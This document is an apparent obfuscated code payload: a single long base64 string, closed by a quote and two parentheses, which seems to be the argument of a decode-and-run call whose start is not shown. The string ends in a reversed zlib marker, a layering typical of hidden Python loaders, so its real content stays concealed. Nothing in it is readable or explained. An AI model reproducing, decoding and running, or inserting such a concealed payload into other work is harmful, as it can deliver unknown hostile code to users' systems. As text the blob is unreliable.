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'))
--------------------------------------------------------------------------------